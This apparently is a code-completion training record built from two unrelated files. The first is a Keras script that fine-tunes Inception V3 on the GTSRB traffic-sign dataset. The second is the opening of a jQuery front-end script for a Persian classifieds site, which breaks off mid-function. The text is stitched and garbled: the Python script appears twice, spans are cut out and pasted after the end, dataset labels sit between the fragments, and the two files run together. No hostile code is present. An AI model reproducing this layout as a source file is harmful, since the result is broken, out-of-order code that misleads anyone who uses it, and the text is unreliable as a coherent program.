from keras.models import Sequential
from keras.optimizers import SGD
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras import backend as K
from keras.callbacks import LearningRateScheduler, ModelCheckpoint, EarlyStopping, CSVLogger
from keras.preprocessing.image import ImageDataGenerator
from skimage import io, color, exposure, transform
from sklearn.model_selection import train_test_split
from sklearn.cross_validation import train_test_split
from sklearn.metrics import log_loss
from new_load_GTSRB_Inception import load_GTSRB_data_1
class AccuracyHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.acc = []
def on_epoch_end(self, batch, logs={}):
|
history = AccuracyHistory()
# Variables to run the script with a bat-script
dropout_rate= float(sys.argv[1])#0.5
lr= float(sys.argv[2] )#1e-3
batch_size= int(sys.argv[3])#10
weights_filename= 'vgg16_weights_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.h5'
matrix_filename= 'conf_matrix_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.png'
log_filename='log_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30'
result_file='result_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.txt'
def conv2d_bn(x, nb_filter, nb_row, nb_col,
border_mode='same', subsample=(1, 1),
name=None):
#Utility function to apply conv + BN for Inception V3.
if name is not None:
bn_name = name + '_bn'
conv_name = name + '_conv'
else:
bn_name = None
conv_name = None
bn_axis = 1
x = Convolution2D(nb_filter, nb_row, nb_col,
subsample=subsample,
activation='relu',
border_mode=border_mode,
name=conv_name)(x)
x = BatchNormalization(axis=bn_axis, name=bn_name)(x)
return x
def inception_v3_model(img_rows, img_cols, channel=1, num_classes=None):
channel_axis = 1
img_input = Input(shape=(channel, img_rows, img_cols))
x = conv2d_bn(img_input, 32, 3, 3, subsample=(2, 2), border_mode='valid')
x = conv2d_bn(x, 32, 3, 3, border_mode='valid')
x = conv2d_bn(x, 64, 3, 3)
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = conv2d_bn(x, 80, 1, 1, border_mode='valid')
x = conv2d_bn(x, 192, 3, 3, border_mode='valid')
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
# mixed 0, 1, 2: 35 x 35 x 256
for i in range(3):
branch1x1 = conv2d_bn(x, 64, 1, 1)
branch5x5 = conv2d_bn(x, 48, 1, 1)
branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 32, 1, 1)
x = merge([branch1x1, branch5x5, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(i))
# mixed 3: 17 x 17 x 768
branch3x3 = conv2d_bn(x, 384, 3, 3, subsample=(2, 2), border_mode='valid')
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed3')
# mixed 4: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 128, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 128, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 128, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed4')
# mixed 5, 6: 17 x 17 x 768
for i in range(2):
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 160, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 160, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(5 + i))
# mixed 7: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 192, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed7')
# mixed 8: 8 x 8 x 1280
branch3x3 = conv2d_bn(x, 192, 1, 1)
branch3x3 = conv2d_bn(branch3x3, 320, 3, 3,
subsample=(2, 2), border_mode='valid')
branch7x7x3 = conv2d_bn(x, 192, 1, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 1, 7)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 7, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = AveragePooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch7x7x3, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed8')
# mixed 9: 8 x 8 x 2048
for i in range(2):
branch1x1 = conv2d_bn(x, 320, 1, 1)
branch3x3 = conv2d_bn(x, 384, 1, 1)
branch3x3_1 = conv2d_bn(branch3x3, 384, 1, 3)
branch3x3_2 = conv2d_bn(branch3x3, 384, 3, 1)
branch3x3 = merge([branch3x3_1, branch3x3_2],
mode='concat', concat_axis=channel_axis,
name='mixed9_' + str(i))
branch3x3dbl = conv2d_bn(x, 448, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 384, 3, 3)
branch3x3dbl_1 = conv2d_bn(branch3x3dbl, 384, 1, 3)
branch3x3dbl_2 = conv2d_bn(branch3x3dbl, 384, 3, 1)
branch3x3dbl = merge([branch3x3dbl_1, branch3x3dbl_2],
mode='concat', concat_axis=channel_axis)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(9 + i))
# Fully Connected Softmax Layer
x_fc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_fc = Flatten(name='flatten')(x_fc)
x_fc = Dense(1000, activation='softmax', name='predictions')(x_fc)
# Create model
model = Model(img_input, x_fc)
# Load ImageNet pre-trained data
model.load_weights('imagenet_models/inception_v3_weights_th_dim_ordering_th_kernels.h5')
# Truncate and replace softmax layer for transfer learning
# Cannot use model.layers.pop() since model is not of Sequential() type
# The method below works since pre-trained weights are stored in layers but not in the model
x_newfc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_newfc = Flatten(name='flatten')(x_newfc)
x_newfc = Dense(num_classes, activation='softmax', name='predictions')(x_newfc)
# Create another model with our customized softmax
model = Model(img_input, x_newfc)
# Learning rate is changed to 0.001
sgd = SGD(lr, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
return model
def lr_schedule(epoch): # function that takes an epoch index as input and returns a new learning rate as output
return lr*(0.1**int(epoch/10))
if __name__ == '__main__':
img_rows, img_cols = 299, 299 # Resolution of inputs
channel = 3
num_classes = 43
# batch_size = 10 # 20
nb_epoch = 30
# Load data. Please implement your own load_data() module for your own dataset
X_train, Y_train, X_valid, Y_valid, Y_test = load_GTSRB_data_1(img_rows, img_cols)
# Load our model
print("loading model")
model = inception_v3_model(img_rows, img_cols, channel, num_classes)
csv_logger=CSVLogger('training.log') # callback that streams epoch results to a csv file
print("start fine tuning")
# Start Fine-tuning
model.fit(X_train, Y_train,
batch_size=batch_size,
nb_epoch=nb_epoch,
shuffle=True,
verbose=1,
validation_split=0.2, # fraction of the data held-out for validation
callbacks=[LearningRateScheduler(lr_schedule), history,csv_logger,
ModelCheckpoint(weights_filename, monitor='val_acc', verbose=1, save_best_only=True, mode='max')]
)
# ModelCheckpoint('incep_weights.{epoch:02d}-{val_loss:.2f}.h5',
#EarlyStopping(monitor='val_loss', patience=2, verbose=0),
#Get history of accuracy and plot it
# print("hhistory acc: ",history.acc)
# print(" history acc type: ", type(history.acc))
#np.save('history_acc_inception', history.acc)
#plt.plot(range(1,nb_epoch+1), history.acc)
#plt.xlabel('Epochs')
#plt.ylabel('Accuracy')
#plt.title("Inception")
#plt.show()
y_pred= model.predict_classes(X_valid)
print("Predictions: ", y_pred)
model.metrics_names
y_eval=model.evaluate(X_valid,Y_valid)
print("Evaluation: ", y_eval)
f=open(result_file, 'w')
f.write('Y_pred: ' + str(y_pred) )
f.write('Y_eval: ' + str(y_eval))
f.close()
cm=confusion_matrix(Y_test, y_pred) # confusion matrix
print(cm)
plt.matshow(cm)
plt.title('Confusion matrix InceptionV3')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
#plt.show()
plt.savefig(matrix_filename)
plt.close()
print("Done!")
| self.acc.append(logs.get('acc')) | identifier_body |
fine_tune_Inception.py |
# Taken from: https://github.com/flyyufelix/cnn_finetune/blob/master/vgg16.py
# based on: https://gist.github.com/baraldilorenzo/07d7802847aaad0a35d3
# -*- coding: utf-8 -*-
import keras
import itertools
import sys
from sklearn.metrics import confusion_matrix
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from keras.models import Sequential
from keras.optimizers import SGD
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras import backend as K
from keras.callbacks import LearningRateScheduler, ModelCheckpoint, EarlyStopping, CSVLogger
from keras.preprocessing.image import ImageDataGenerator
from skimage import io, color, exposure, transform
from sklearn.model_selection import train_test_split
from sklearn.cross_validation import train_test_split
from sklearn.metrics import log_loss
from new_load_GTSRB_Inception import load_GTSRB_data_1
class AccuracyHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.acc = []
def on_epoch_end(self, batch, logs={}):
self.acc.append(logs.get('acc'))
history = AccuracyHistory()
# Variables to run the script with a bat-script
dropout_rate= float(sys.argv[1])#0.5
lr= float(sys.argv[2] )#1e-3
batch_size= int(sys.argv[3])#10
weights_filename= 'vgg16_weights_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.h5'
matrix_filename= 'conf_matrix_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.png'
log_filename='log_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30'
result_file='result_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.txt'
def conv2d_bn(x, nb_filter, nb_row, nb_col,
border_mode='same', subsample=(1, 1),
name=None):
#Utility function to apply conv + BN for Inception V3.
if name is not None:
bn_name = name + '_bn'
conv_name = name + '_conv'
else:
bn_name = None
conv_name = None
bn_axis = 1
x = Convolution2D(nb_filter, nb_row, nb_col,
subsample=subsample,
activation='relu',
border_mode=border_mode,
name=conv_name)(x)
x = BatchNormalization(axis=bn_axis, name=bn_name)(x)
return x
def inception_v3_model(img_rows, img_cols, channel=1, num_classes=None):
channel_axis = 1
img_input = Input(shape=(channel, img_rows, img_cols))
x = conv2d_bn(img_input, 32, 3, 3, subsample=(2, 2), border_mode='valid')
x = conv2d_bn(x, 32, 3, 3, border_mode='valid')
x = conv2d_bn(x, 64, 3, 3)
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = conv2d_bn(x, 80, 1, 1, border_mode='valid')
x = conv2d_bn(x, 192, 3, 3, border_mode='valid')
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
# mixed 0, 1, 2: 35 x 35 x 256
for i in range(3):
|
# mixed 3: 17 x 17 x 768
branch3x3 = conv2d_bn(x, 384, 3, 3, subsample=(2, 2), border_mode='valid')
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed3')
# mixed 4: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 128, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 128, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 128, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed4')
# mixed 5, 6: 17 x 17 x 768
for i in range(2):
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 160, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 160, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(5 + i))
# mixed 7: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 192, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed7')
# mixed 8: 8 x 8 x 1280
branch3x3 = conv2d_bn(x, 192, 1, 1)
branch3x3 = conv2d_bn(branch3x3, 320, 3, 3,
subsample=(2, 2), border_mode='valid')
branch7x7x3 = conv2d_bn(x, 192, 1, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 1, 7)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 7, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = AveragePooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch7x7x3, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed8')
# mixed 9: 8 x 8 x 2048
for i in range(2):
branch1x1 = conv2d_bn(x, 320, 1, 1)
branch3x3 = conv2d_bn(x, 384, 1, 1)
branch3x3_1 = conv2d_bn(branch3x3, 384, 1, 3)
branch3x3_2 = conv2d_bn(branch3x3, 384, 3, 1)
branch3x3 = merge([branch3x3_1, branch3x3_2],
mode='concat', concat_axis=channel_axis,
name='mixed9_' + str(i))
branch3x3dbl = conv2d_bn(x, 448, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 384, 3, 3)
branch3x3dbl_1 = conv2d_bn(branch3x3dbl, 384, 1, 3)
branch3x3dbl_2 = conv2d_bn(branch3x3dbl, 384, 3, 1)
branch3x3dbl = merge([branch3x3dbl_1, branch3x3dbl_2],
mode='concat', concat_axis=channel_axis)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(9 + i))
# Fully Connected Softmax Layer
x_fc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_fc = Flatten(name='flatten')(x_fc)
x_fc = Dense(1000, activation='softmax', name='predictions')(x_fc)
# Create model
model = Model(img_input, x_fc)
# Load ImageNet pre-trained data
model.load_weights('imagenet_models/inception_v3_weights_th_dim_ordering_th_kernels.h5')
# Truncate and replace softmax layer for transfer learning
# Cannot use model.layers.pop() since model is not of Sequential() type
# The method below works since pre-trained weights are stored in layers but not in the model
x_newfc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_newfc = Flatten(name='flatten')(x_newfc)
x_newfc = Dense(num_classes, activation='softmax', name='predictions')(x_newfc)
# Create another model with our customized softmax
model = Model(img_input, x_newfc)
# Learning rate is changed to 0.001
sgd = SGD(lr, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
return model
def lr_schedule(epoch): # function that takes an epoch index as input and returns a new learning rate as output
return lr*(0.1**int(epoch/10))
if __name__ == '__main__':
img_rows, img_cols = 299, 299 # Resolution of inputs
channel = 3
num_classes = 43
# batch_size = 10 # 20
nb_epoch = 30
# Load data. Please implement your own load_data() module for your own dataset
X_train, Y_train, X_valid, Y_valid, Y_test = load_GTSRB_data_1(img_rows, img_cols)
# Load our model
print("loading model")
model = inception_v3_model(img_rows, img_cols, channel, num_classes)
csv_logger=CSVLogger('training.log') # callback that streams epoch results to a csv file
print("start fine tuning")
# Start Fine-tuning
model.fit(X_train, Y_train,
batch_size=batch_size,
nb_epoch=nb_epoch,
shuffle=True,
verbose=1,
validation_split=0.2, # fraction of the data held-out for validation
callbacks=[LearningRateScheduler(lr_schedule), history,csv_logger,
ModelCheckpoint(weights_filename, monitor='val_acc', verbose=1, save_best_only=True, mode='max')]
)
# ModelCheckpoint('incep_weights.{epoch:02d}-{val_loss:.2f}.h5',
#EarlyStopping(monitor='val_loss', patience=2, verbose=0),
#Get history of accuracy and plot it
# print("hhistory acc: ",history.acc)
# print(" history acc type: ", type(history.acc))
#np.save('history_acc_inception', history.acc)
#plt.plot(range(1,nb_epoch+1), history.acc)
#plt.xlabel('Epochs')
#plt.ylabel('Accuracy')
#plt.title("Inception")
#plt.show()
y_pred= model.predict_classes(X_valid)
print("Predictions: ", y_pred)
model.metrics_names
y_eval=model.evaluate(X_valid,Y_valid)
print("Evaluation: ", y_eval)
f=open(result_file, 'w')
f.write('Y_pred: ' + str(y_pred) )
f.write('Y_eval: ' + str(y_eval))
f.close()
cm=confusion_matrix(Y_test, y_pred) # confusion matrix
print(cm)
plt.matshow(cm)
plt.title('Confusion matrix InceptionV3')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
#plt.show()
plt.savefig(matrix_filename)
plt.close()
print("Done!")
| branch1x1 = conv2d_bn(x, 64, 1, 1)
branch5x5 = conv2d_bn(x, 48, 1, 1)
branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 32, 1, 1)
x = merge([branch1x1, branch5x5, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(i)) | conditional_block |
custom.js |
//////////////////////////////////////////////////////////////////////////////////
$(document).ready(function(){
//IE
isIE = /*@cc_on!@*/false || !!document.documentMode;
if (isIE) {
$( 'header, footer, main, aside' ).each(function(){
$(this).replaceWith( '<div class="ie-' + $(this).prop("tagName").toLowerCase() + '">' + $( this ).html() + "</div>" );
})
$('.ie-main').addClass('clearfix')
}
//header
//header - searchbox
$('#headertools button[name=search]').click(function(){
$('input.topbarSearch').focus();
})
$('input.topbarSearch').focus(function(){
$('#headertools button[name=search]').hide();
$('#headertools button[name=close]').show();
$('#topbar .title').hide()
});
$('input.topbarSearch').focusout(function(){
$('#headertools button[name=search]').show();
$('#headertools button[name=close]').hide();
setTimeout(function(){
$('#topbar .title').fadeIn()
},500);
});
// slider
if ($('.slider').length) {
sliderBuild();
sliderRoll(1);
}
//order
changeOrder()
//pop menue
$('.popmenu').not('.popmenu.active').click(function(){
$('.popmenu').removeClass('active');
$(this).addClass('active');
})
$(document).on('click', function (e) {
if ($('.popmenu.active').length && $(e.target).closest('.popmenu.active').length === 0) {
$('.popmenu').removeClass('active');
}
});
// hash links
if (window.location.hash.length) {
setTimeout(function () {
aHash(window.location.hash)
}, 1000);
}else {
setTimeout(function () {
aHash()
}, 1000);
}
$("a[href^=#]").click(function( e ) {
e.preventDefault();
aHash($(this).attr('href'))
})
function aHash(hash) {
if (hash) {
hash = hash
}else{
hash = $('.director a[href^=#]').attr('href')
}
if (hash && hash.length> 1) {
console.log(hash);
$("a[href^=#]").removeClass('active');
$('a[href=' + hash + ']').addClass('active');
window.location.hash = hash;
$('main > *.active').removeClass('active');
var hash = $(hash).get(0)
$(hash).addClass('active');
}
}
//click Effect
$('.cfx').click(function(e){
var elm = $(this);
var width = ($(this).width() * 1.5)
var xPos = Math.floor(e.pageX - elm.offset().left);
var yPos = Math.floor(e.pageY - elm.offset().top);
pob = ~~(Math.random() * 10000)
$(this).append('<div id="bubble' + pob + '" class="bubbleWrap"></div>');
$('#bubble' + pob).append('<div class="bubble"></div>');
$('#bubble' + pob + ' .bubble').css({
'left': xPos - (width / 2),
'top': yPos - (width / 2),
'width': width,
'height': width,
'-webkit-transform' : 'scale(0)',
'-moz-transform' : 'scale(0)',
'-ms-transform' : 'scale(0)',
'-o-transform' : 'scale(0)',
'transform' : 'scale(0)'
})
setTimeout(function () {
$('#bubble' + pob + ' .bubble').addClass('active')
}, 100);
setTimeout(function(){
// $('#bubble' + pob).remove()
},1000)
});
// box scroll fix
$('.scrlfix').bind('mousewheel DOMMouseScroll', function(e) {
var scrollTo = null;
if (e.type == 'mousewheel') {
scrollTo = (e.originalEvent.wheelDelta * -.1);
}
else if (e.type == 'DOMMouseScroll') {
scrollTo = .1 * e.originalEvent.detail;
}
if (scrollTo) {
e.preventDefault();
$(this).scrollTop(scrollTo + $(this).scrollTop());
}
});
//Moble Mode
if (window.innerWidth < 721) {mobileModeStart()};
if (window.innerWidth > 720) | ;
$(document).on('click', '#showmenu', function() {
$("#menu , #hidemenu").addClass("active");
$(this).removeClass("active");
$("#menu").offset({left: 0});
$("nav, #headertools").addClass("menu");
$('#topbar').append('<div id="dimmer"></div>');
$('html').css({'overflow':'hidden'});
$('body').append('<div id="menucover"></div>');
setTimeout(function () {
$('#dimmer').addClass('active');
$('#menucover').addClass('active');
}, 500);
})
$(document).on('click', '#dimmer ', function() {
$("#menu").removeClass("active");
$("#menu").offset({left: -250});
$("nav, #headertools").removeClass("menu");
$('html').css({'overflow':'auto'});
$("#showmenu").addClass("active");
$('#hidemenu').removeClass("active");
$(this).remove();
$('#menucover').remove();
});
$(document).on('click', '#hidemenu ', function() {
$("#dimmer").click();
});
// bazaar page
$('#ads .ad section').click(function(e){
if (e.target.nodeName != 'BUTTON') {
var target = $(this).closest('section').children('a').attr('href')
window.location.href = target
}
});
// bazaar page - filter bar
$('#filterbar button[name=list]').click(function(){
$('#filterbar button[name=grid]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
})
$('#filterbar button[name=grid]').click(function(){
$('#filterbar button[name=list]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
})
$('#filterbar button[name=filters]').click(function(){
$(this).toggleClass('active');
$('#filters').toggleClass('active');
})
$('#filterbar button[name=sort]').click(function(){
$(this).toggleClass('active');
$('#sort').toggleClass('active');
})
$('#sort, #filters').children('button[name=close]').click(function(){
var name = $(this).closest('section').attr('id');
$('#filterbar button[name=' + name + ']').click();
})
//ad page
$('#adGalleryList .thumbnail').click(function(){
$('#adGalleryList .thumbnail').removeClass('active');
$(this).addClass('active');
var src = $(this).attr('imgsrc')
$('#adGallerySelected').css({'background':'url(' + src + ')'})
})
// bookmark button
$('button[name=bookmark]').click(function(){
alert('Bookmark Test')
})
//forms
$('input[name=resetpassword]').click(function(){
$('#password-reset').show()
$(this).hide()
})
// image selectors
$(document).on('change', 'input[type=file]', function() {
if (this.files && this.files[0]) {
var target = '.' + $(this).attr('t')
var reader = new FileReader();
reader.onload = function (e) {
$(target).css({'background': 'url(' + e.target.result + ')'}).show();
};
reader.readAsDataURL(this.files[0]);
}
})
//image add
imgNum = $('.box.pics div').length + 1;
$('input[name=addPicture]').click(function(){
if (imgNum < 5) {
var fieldset = $(this).closest('fieldset').get(0)
var box = $(fieldset).children('.box')
$(fieldset).append('<input type="file" name="adp-' + imgNum + '" accept="image/*" t="adp-' + imgNum + '" >')
$(box).removeClass('hidden').append('<div style="display:none;" class="adp-' + imgNum + '"><i ></i></div>')
$('input[name=adp-' + imgNum + ']').click();
imgNum = imgNum + 1;
}else{
alert('شما حداکثر مجاز به انتخاب چهار تصویر برای هر آگهی هستید!')
}
})
// image remove
$(document).on('click', '.box > div ', function() {
$(this).remove()
$('input[name=' + $(this).attr('class') + ']').remove();
imgNum = imgNum - 1;
$('input[name=addPicture]').prop('disabled', false);
//
var input = $('body input[name^=adp]');
for (var i = 0; i < input.length; i++) {
var element = input[i]
$(element).attr('name', 'adp-' + (i+1)).attr('t' , 'adp-' + (i+1))
}
var image = $('body .box.pics div');
for (var i = 0; i < image.length; i++) {
var element = image[i]
$(element).attr('class' , 'adp-' + (i+1))
}
});
});
//////////////////////////////////////////////////////////////////////////////////
$(window).resize(function(){
if (window.innerWidth < 721) {mobileModeStart()};
if (window.innerWidth > 720) {mobileModeEnd()};
if ($('.slider').length) {
sliderResize()
}
changeOrder()
});
//////////////////////////////////////////////////////////////////////////////////
menu = false
//Moble mode
function mobileModeStart() {
if (menu !== true && $('body.msg').length < 1) {
mobileMenuBuild();
listHorizontaller()
filterbarMobile()
}
}
function mobileModeEnd() {
if (menu) {
mobileMenuremover();
listVerticaller()
filterbarNormal()
}
}
function mobileMenuBuild() {
$('#headertools').wrap( '<div class="clearfix" id="menu"></div>' );
$('nav, #footersitemap, #footersocials').appendTo('#menu');
$('body').append('<button id="showmenu" title="منو" type="button" class="icon cfx active" name="menu"></button>');
$('body').append('<button id="hidemenu" title="بستن" type="button" class="icon cfx" name="menu"></button>');
menu = true;
}
function mobileMenuremover() {
$('nav, #headertools').unwrap();
$('#showmenu, #hidemenu').remove();
if (isIE) {
$('#footersitemap, #footersocials').appendTo('.ie-footer');
}else {
$('#footersitemap, #footersocials').appendTo('footer');
}
menu = false;
}
function listHorizontaller() {
